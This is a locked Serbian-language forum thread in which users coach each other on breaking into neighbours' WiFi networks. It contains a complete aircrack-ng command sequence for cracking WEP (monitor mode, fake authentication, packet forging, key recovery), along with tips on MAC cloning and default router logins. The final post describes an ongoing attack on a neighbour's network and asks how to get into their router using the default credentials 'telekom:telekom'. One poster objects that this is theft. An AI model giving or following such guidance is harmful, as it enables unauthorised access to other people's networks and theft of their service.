Hakovanje WiFi mreza-ZABRANJENA TEMA

stanje
Zatvorena za pisanje odgovora.
odustani...mnogo vremena snimanja transmisije, mnogo srece,i mnogo zajebancije...iz iskustva znam da je lakse komsiji skuvati kafui zamoliti za sifru...
Ali, buduci da moras da probas: procitaj malo o "capture protokol"... da ti bude jasnije...zavisi i od vrste zastite koju komsija koristi, tvog znanja i sl...
I taman provalis sifru (bez zezanja moze i mesec dana svakodnevnog snimanja da prodje), komsija shvati da mu je pao protok i promeni sifru.....
 
za wep, moze i dobar vocabular...imas na netu...moze i brute force, ali teze..uglavnom winpcap i jos neki uz njega, obicno se preporucuju u paru , ja sam koristio "cain"...sustina je da sa winpcap, "snimas neko vreme transmisiju izmedju AP i kompjutera, kako bi dosao do hash-a...taj log ubacisu Cain, i on ti (u teoriji) iz hash-a izvuce pass...i opet ti nece vredeti, ako je sastavio listu dozvoljenih uredjaja po mac adresi...onda moras i i 'mac clone", pa da probas...uzaludno, ali ako imas viska vremena...
obicno ljudi stave "admin", pogotovo ako imas na listi genericko ime AP, nesto kao :tp-link xy....
A probaj i foru da u explorer bar, ukucas :http://192.168.1.1 to je standardna adresa rutera u mrezi (bilo kojoj)...onda, ako udjes u setup rutera,podesi sta treba i gotovo...mozda upali...
 
Nije do komsije, specificna je situacija. Inace, nalazim po 30 network-a, medjutim nijedan ne mogu da provalim. Kazete da je za WEP dosta lako? Jel mozes da mi kazes koji program i kako da koristim za WEP, kada imam windows 7?

Za WEP ti treba :

1. Wireless Kartica USB TL-WN 422G http://www.itsvet.com/proizvod/tp-link-tl-wn422g/comp_comp_networkadapter/317/233

2. OS - Back Track 4r2 ( Live DVD )

3. Tutorijal sa Youtube - ima ih puno

WEP Cracking with Back Track 4

ifconfig rausb0 down

airmon-ng start rausb0

airodump-ng -c (Channel that the AP is on) -w (What you want to write your iv's) rausb0

aireplay-ng -1 0 -e (AP's ESSID) -a (AP's BSSID) -h (Your card's MAC address) rausb0

aireplay-ng -5 -b (AP's BSSID) -h (Your card's MAC address) rausb0

or

aireplay-ng -4 -b (AP's BSSID) -h (Your card's MAC address) rausb0

packetforge-ng -0 -a (AP's BSSID)-h (Your card's MAC address) -k 255.255.255.255 -l 255.255.255.255 -y (file
from chopchop or fragmentation.xor) -w (What you want to write you forged arp packet as)

aireplay-ng -2 -r (What you wrote your arp packet as) rausb0

aircrack-ng -z (What your wrote your iv's as, from step 3)*.cap

:hvala:
 
Poslednja izmena:
VMware workstation i instaliras sta hoces, meni za WEP treba 5-10min ! Ubrzas slanje paketa, samo ne mogu sve WiFi kartice
Nije nista komplikovano imas 5-6 linija coda da copy/paste i to su sve muke, ima na YouTube detaljno sta treba instalirati i sta kucati, a i vec je neko napisao

A sto se tice WPA, ti si verovatno na najtezi nacin pokusavao da 'saznas' sifru, pomocu liste reci... a sifra je mozda >|wq=_2~ ovakva , pa je ne bi provalio nikad.
Postoje i druge metode dosta lakse. Danas i klinci provaljuju WEP.

A to za filtriranje po MAC adresi, ko je stavio WEP sifru taj i ne zna sta je MAC,
 
Inace radi se o laptopu. Imam ovu karticu: Atheros ar9285 wireless network adapter.
Znaci treba da instaliram program VMware workstation? I pomocu njega su provaliti? Naravno uz upustvo za koriscenje.

Treba ti VMware da bi pomocu njega instalirao linux, znaci tvoj vec instalirani windows ne diras, vec iz VMware pokreces linux preko kog ces hakovati... a windows ti i dalje radi
pa dok ceprkas po linuksu u windowsu mozes da pustis YouTube tutorijal, da bi ti bilo lakse...

Nije bas ni toliko jednostavno kao sto mislis, nema da instaliras samo jedan program i jedan klik i on ti zavrsi posao :)

Napravio bi ja tutorijal za to, samo ne znam da li ce moderatori to dopustiti i da li je po pravilima foruma?
a inace na YouTube mozes naci tutorijal za VMware i za hack...
 
OMG, šta li moderatori ne zaključavaju ovu temu??
Informacije o crackovanju wifi mreža su više nego dostupne na internetu,
na youtube, na warez forumima itd ma mislim da nema potreba da se ovde na krstarici
toliko priča o tome jer svako sa minimalnim znanjem engleskog jezika može da nadje podatke
koji su mu potrebni. Na primer ovde je bila tema o hakovanju facebooka, nju su moderatori zaključali i obrisali...
Lično nemam ništa protiv ove teme u cilju edukacije...
Ali kradja interneta je zakonom zabranjena, a i moralno gledano ne postoji opravdanje za istu.
Taj komšija od koga kradete internet je stavio šifru u cilju sprečavanja kradje...
Tako da hajde lock... A o sličnim temama po meni je potpuno prihvatljivo da raspravljate, ali na PP.
 
Ja se vec 2 dana mucim s komsijinim WEP-om.
Mreza je bas jaka 4-5 crtica.
Sve lepo odradim u back tracku ali aktivnost na mrezi nikakva. Tek 10-12 paketa za sat vremena sakupi. A sa injection 30 do 45 za sat, tako da za 5.000 cu da se ubrisem i sve mi se cini da od toga nema nista jer on izgleda wifi ne koristi uopste, samo LAN.
Nego, znam da nije menjao sifru za logovanje na router i da je i dalje telekom:telekom. Postoji li neki nacin da mu udjem u log rutera? :evil:
 
stanje
Zatvorena za pisanje odgovora.

Back
Top